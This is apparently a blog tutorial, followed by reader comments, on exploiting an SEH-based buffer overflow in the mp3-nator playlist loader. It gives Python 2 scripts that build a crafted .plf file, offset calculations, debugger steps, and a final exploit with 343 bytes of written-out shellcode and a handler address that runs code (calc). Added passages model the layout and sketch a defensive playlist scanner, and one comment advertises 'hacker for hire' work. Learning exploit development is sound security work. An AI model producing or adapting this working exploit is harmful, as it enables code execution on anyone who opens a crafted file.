Today I re-exploited a piece of software called mp3-nator. SEH-based exploitation is a bit challenging, so I am going to show you quickly how I exploited this SEH-based vulnerability using only the following tools:
1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit (for the shellcode).
4. The vulnerable application (mp3-nator).
print "Creating exploit."    # Python 2 script
push="A"*6000                # 6000 bytes of junk to trigger the crash
try:
    f=open("nator.plf","wb") # Create the playlist file (binary mode so bytes are written as-is)
    f.write(push)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"
After generating nator.plf we need to open it in the application:
1. Click on the PlayList menu.
2. Load PlayList.
3. Open nator.plf.
But unfortunately it does not overwrite EIP at all: the overflow raises an access violation first, and the exception is dispatched through the SEH chain.
EDX, EBP, ESI and EDI hold our buffer (we could replace it with shellcode!), but the SEH record also got overwritten by our buffer:
Overwriting SEH means we control both the handler (SEH) and the next-SEH pointer, which means we can make the handler divert execution to our shellcode!
The mona command is simply pattern_create 6000; replace "A" with the pattern saved in the location mona reports (for me: C:\mona\MP3N). Re-generate nator.plf, open it with Mp3-nator under Immunity, and we see:
We see SEH and next SEH overwritten with mona's pattern. Now we need to find out how much junk is needed to reach SEH (the same procedure as for EIP). Let's find out:
Now we are sure that 4112 bytes are needed to overwrite SEH (4108 to reach next SEH). To be 100% sure we test it again:
print "Creating exploit."    # Python 2 script
push="A"*4108                # 4112-4: junk up to next SEH
push+="B"*4                  # Next SEH
push+="C"*4                  # SEH
push+="D"*2000               # Space where the shellcode will go
try:
    f=open("nator.plf","wb") # Create the playlist file (binary mode)
    f.write(push)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"
If next SEH is "BBBB" and SEH is "CCCC" then we are ready to go.
Anyway, I chose the address 0x00448f7a in MP3N.exe. Since our return address contains a null byte, we simply can't put our shellcode after it as we did before.
Now our exploit layout:
The simple way to explain it: 2608 (junk) + 343 (shellcode) + 1152 (NOPs) + 5 (jump) = 4108, exactly the offset of next SEH.
Anyway, let's get back to the debugger and do a test:
print "Creating exploit."    # Python 2 script
junk="\x90"*2608             # NOP padding that sits before the shellcode
#343 bytes shellcode
shellcode ="D"*343           # Placeholder for this test run
nops ="\x90"*1152
jump ="\xe9\x2b\xf8\xff\xff" # Jump back -2000 bytes (jmp $-2000) into the junk NOPs
nseh ="\xeb\xea\x90\x90"     # Short jump back into the NOPs, then padding
seh ="\x7a\x8f\x44\x00"      # 0x00448f7a, little-endian
more="\x90"*1000
try:
    f=open("nator.plf","wb") # Create the playlist file (binary mode)
    f.write(junk+shellcode+nops+jump+nseh+seh+more)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"
Open the application in the debugger, run it, and search for the SEH address 0x00448f7a. Set a breakpoint there by pressing F2.
After pressing SHIFT+F9 we hit the breakpoint. Now press F8 (step) until we reach the NOPs:
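The arithmetic behind the layout, and the two jumps the handler address leads into, carried through as an added Python 3 example that is not the post's code: it models the file with a "D" placeholder in place of the shellcode and decodes the jumps from the post's own byte values.

```python
# Added example (not the post's code): model the post's file layout with a
# placeholder in place of the shellcode and check the arithmetic it relies on.
JUNK, SHELLCODE, NOPS, JUMP = 2608, 343, 1152, 5   # sizes used in the post
NSEH_OFFSET = 4108   # "A"*4108 reaches next SEH; SEH itself is 4 bytes later
SEH_OFFSET = NSEH_OFFSET + 4

def build_layout():
    """Return the bytes the post writes to nator.plf, shellcode replaced by 'D'."""
    buf = b"\x90" * JUNK
    buf += b"D" * SHELLCODE                  # stand-in for the 343-byte shellcode
    buf += b"\x90" * NOPS
    buf += b"\xe9\x2b\xf8\xff\xff"           # the post's 5-byte backward jmp
    buf += b"\xeb\xea\x90\x90"               # next SEH: 2-byte short jmp + padding
    buf += b"\x7a\x8f\x44\x00"               # SEH: 0x00448f7a, little-endian
    buf += b"\x90" * 1000
    return buf

def jmp_target(buf, off):
    """Decode an x86 jmp at offset off and return where it lands in buf."""
    if buf[off] == 0xe9:                     # near jmp: 32-bit signed displacement
        return off + 5 + int.from_bytes(buf[off + 1:off + 5], "little", signed=True)
    if buf[off] == 0xeb:                     # short jmp: 8-bit signed displacement
        return off + 2 + int.from_bytes(buf[off + 1:off + 2], "little", signed=True)
    raise ValueError("no jmp at offset %d" % off)

def slide(buf, off):
    """Walk forward over 0x90 (nop) bytes and return the first non-nop offset."""
    while buf[off] == 0x90:
        off += 1
    return off

def trace():
    """Follow the control flow the post describes once the handler returns."""
    buf = build_layout()
    assert JUNK + SHELLCODE + NOPS + JUMP == NSEH_OFFSET  # 2608+343+1152+5 = 4108
    handler = int.from_bytes(buf[SEH_OFFSET:SEH_OFFSET + 4], "little")
    hop1 = jmp_target(buf, NSEH_OFFSET)      # short jmp lands inside the nop block
    far = slide(buf, hop1)                   # the nops lead to the 5-byte jmp
    hop2 = jmp_target(buf, far)              # which lands inside the junk nops
    return {"handler": handler, "nseh_jmp_to": hop1, "far_jmp_at": far,
            "far_jmp_to": hop2, "shellcode_at": slide(buf, hop2)}

if __name__ == "__main__":
    for k, v in trace().items():
        print("%-13s 0x%08x (%d)" % (k, v, v))
```

The short jump at next SEH lands 22 bytes back at offset 4088, the NOPs slide to the 5-byte jump at 4103, and its displacement of -2005 lands at 2103 in the junk NOPs, which slide to the shellcode at 2608.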
So it is time to put our real shellcode. Here is the final script:
print "Creating exploit."    # Python 2 script
junk="\x90"*2608             # NOP padding that sits before the shellcode
#343 bytes shellcode
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")
nops ="\x90"*1152
jump ="\xe9\x2b\xf8\xff\xff" # Jump back -2000 bytes (jmp $-2000) into the junk NOPs
nseh ="\xeb\xea\x90\x90"     # Short jump back into the NOPs, then padding
seh ="\x7a\x8f\x44\x00"      # 0x00448f7a, little-endian
more="\x90"*1000
try:
    f=open("nator.plf","wb") # Create the playlist file (binary mode)
    f.write(junk+shellcode+nops+jump+nseh+seh+more)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"
Note: I copied the shellcode from a working exploit, but you can always generate shellcode with Metasploit. Do so!
And calc pops up:
I have tried to keep it simple. If you want to know more about SEH-based exploits, corelan has a very good tutorial on SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ and
Good luck and happy hunting!!!
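From the loader's side, the crash file is just a playlist entry of absurd length. As an added Python 3 example (not the post's code), a triage check that flags such files; it assumes the playlist format is one path per line, which is my assumption, not something the post states.

```python
# Added example (not the post's code): triage a playlist file for the traits of
# the crash file built in the post. Format assumption (mine): one path per line.
import re

MAX_ENTRY = 260                         # Windows MAX_PATH; a real path is never longer
NOP_SLED = re.compile(rb"\x90{16,}")    # 16 or more consecutive 0x90 bytes
CONTROL = set(range(0x20)) - {0x09}     # control bytes other than tab

def scan_playlist(data):
    """Return (line_no, code) findings for a playlist's raw bytes; [] means clean."""
    findings = []
    for n, entry in enumerate(data.splitlines(), 1):
        if len(entry) > MAX_ENTRY:
            findings.append((n, "oversize"))       # the entry the loader overflows on
        if NOP_SLED.search(entry):
            findings.append((n, "nop_sled"))
        if any(b in CONTROL for b in entry):
            findings.append((n, "control_bytes"))
    return findings

# Constructed samples: an ordinary playlist, the post's 6000-byte crash file,
# and a short entry carrying a NOP sled.
BENIGN = b"C:\\Music\\track01.mp3\r\nC:\\Music\\track02.mp3\r\n"
CRASH = b"A" * 6000
SLED = b"C:\\Music\\x.mp3" + b"\x90" * 32

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("crash", CRASH), ("sled", SLED)):
        print(name, scan_playlist(sample) or "clean")
```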
This is a great tutorial and simple. Thanks for publishing the tutorial!
Did you use any software for doing the calculation?
Yeah, metasm from Metasploit and Python.
Nice tutorial. You can work with us as "Hacker for hire" if you wish! Contact us on hiring@sechacker.com
Again, Nice tutorial!
SecHacker
http://www.sechacker.com
In Kali I tried the command /usr/share/metasploit-framework/lib/metasm/ruby metasm.rb jmp $-2000 and it doesn't work. Please guide.
Very useful. Thank you so much!